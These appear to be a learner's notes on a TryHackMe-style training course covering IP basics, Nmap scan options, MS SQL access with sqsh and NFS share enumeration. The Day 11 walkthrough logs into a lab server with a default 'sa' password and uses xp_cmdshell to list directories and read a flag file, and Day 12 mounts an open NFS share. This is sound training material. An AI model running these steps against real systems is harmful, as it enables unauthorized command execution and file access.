Day 10 & 11 & 12 : Networking - Nmap & MsSQL & NFS (Network File System)

Day 10 : Offence is the best defence

Introduction

IP stands for Internet Protocol. To keep things simple, we will consider Internet Protocol version 4 (IPv4). An IPv4 address is made up of 4 decimal numbers. The range for each number is from 0 to 255. Example IPv4 addresses are:

• 192.168.0.10

• 172.16.0.100

• 10.10.11.12

• 1.1.1.1

• 127.0.0.1 - loopback address

The first 3 IP addresses in the list above are private, meaning that they can only be accessed from the private network they belong to. The last IP address, 1.1.1.1, is a public IP address that can be accessed by the whole Internet and belongs to Cloudflare.

Protocols and Servers

Summary : UDP no 3 way hand shake, TCP needs SYN, ACK, SYN ACK

To name a few, these are some example TCP/IP protocols:

• Hypertext Transfer Protocol (HTTP) for serving webpages - 80

• HTTPS - 443

• Domain Name System (DNS) for resolving hostnames to IP addresses

• Post Office Protocol version 3 (POP3) for delivering email - 110

• Simple Mail Transfer Protocol (SMTP) for sending email - 25

• Telnet for remote login - 23

• Secure Shell (SSH) for secure remote login - 22

NMap

• TCP Connect Scan: To run this type of scan, the -sT option is required. Nmap will attempt to complete the three-way handshake in order to establish a connection with each port scanned.

• TCP SYN Scan: You can select this scan with the -sS option, and Nmap will not make a complete connection if the port is open. Technically speaking, Nmap does not complete a TCP three-way handshake.

To better understand the difference between -sT and -sS, we can use the analogy of knocking on a door.

The TCP connect scan (-sT) is like knocking on a door, waiting for someone to open it, greeting each other, then excusing yourself to leave.

The TCP SYN scan (-sS) resembles knocking, and once someone answers, you pretend that it was not you that knocked and walk away innocently. The latter will make it more difficult for the other party to remember you.

-p- to scan all ports

-T4 for scanning speed , grade 5 is the fastest

Day 11 : Where are the Reindeers

MS SQL Server Introduction

• relational database management system

• MS Windows systems do not respond to ping probes by default , need to add -Pn flag into scans

• -Pn instructs the scan to skip pinging the target to see if the host is reachable --> Nmap will assume target is offline and not proceed with scanning

How to access MS SQL server on target machine :

//skwish command
sqsh -S server -U username -P password
--> server can be IP address of target with MS SQL Server

// To display table "names"
SELECT * FROM table_name WHERE condition;
go

Note that the ; indicates the end of the SQL query, while go sends a SQL batch to the database.

Note that the query won't run unless you send go in a separate line

XP_CMDSHELL

Some MS SQL Servers have xp_cmdshell enabled. If this is the case, we might have access to something similar to a command prompt.

The command syntax is xp_cmdshell 'COMMAND';. Let’s try a simple command, whoami, which shows the user running the commands. In the terminal output below, after connecting to MS SQL Server, we tried xp_cmdshell 'whoami';, and we can see that the user is nt service\mssqlserver. This means that any command we pass to xp_cmdshell will run as nt service\mssqlserver.

Consider the example in the terminal window below where we reveal the contents of the text file WindowsUpdate.log.

Pentester Terminal

pentester@TryHackMe$ sqsh -S 10.10.34.101 -U sa -P "t7uLKzddQzVjVFJp"
sqsh-2.5.16.1 Copyright (C) 1995-2001 Scott C. Gray
Portions Copyright (C) 2004-2014 Michael Peppler and Martin Wesdorp
This is free software with ABSOLUTELY NO WARRANTY
For more information type '\warranty'
1> xp_cmdshell 'type c:\windows\WindowsUpdate.log';
2> go

	output
	
[...]
        
        Windows Update logs are now generated using ETW (Event Tracing for Windows).
	Please run the Get-WindowsUpdateLog PowerShell command to convert ETW traces into a readable WindowsUpdate.log.

	NULL
	
	NULL
	
	For more information, please visit https://go.microsoft.com/fwlink/?LinkId=518345 
(5 rows affected, return status = 0)
1>

Commands for solving the task : Find the flag.txt in grinch's user directory via the MS SQL server xp_cmdshell interactions

// STEPS
1) sqsh -S 10.10.34.101 -U sa -P "t7uLKzddQzVjVFJp"
2) xp_cmdshell 'dir C:\Users\grinch'
3) We looked around into Documents and found it as flag.txt
xp_cmdshell 'dir C:\Users\grinch\Documents'
4) xp_cmdshell 'type C:\Users\grinch\Documents\flag.txt'

DONE

Day 12 : Network File System (NFS)

Network File System (NFS) is a protocol that allows the ability to transfer files between different computers and is available on many systems, including MS Windows and Linux. Consequently, NFS makes it easy to share files between various operating systems.

let’s check what files are being shared. We can do this using the command showmount. In the terminal below, we run showmount -e 10.10.146.45. The -e or --exports show the NFS server’s export list.

pentester@TryHackMe$ showmount -e 10.10.146.45 
Export list for 10.10.146.45: 
/share (everyone) 
/my-notes (noone)

As we can see in the terminal output above, we have two shares, /share and /my-notes

Let’s try to mount the shares we have discovered. We can create a directory on the AttackBox using mkdir tmp1, where tmp1 is the directory’s name. Then we can use this directory we created to mount the public NFS share using: mount 10.10.146.45:/my-notes tmp1.

pentester@TryHackMe$ mount 10.10.146.45:/my-notes tmp1 mount.nfs: access denied by server while mounting 10.10.146.45:/my-notes

We can see that the mounting has failed. my-notes is not public and requires specific authentication mechanisms that we don’t have access to. Let’s try again with the other folder, share.

pentester@TryHackMe$ mount 10.10.146.45:/share tmp1

We didn’t get any error messages, so it was a success. Let’s go inside the share to see what’s inside it using cd tmp1, then ls.

pentester@TryHackMe$ ls 132-0.txt 2680-0.txt

There are two text files. We can open the file using any text editor such as nano FILENAME or something quicker such as less FILENAME.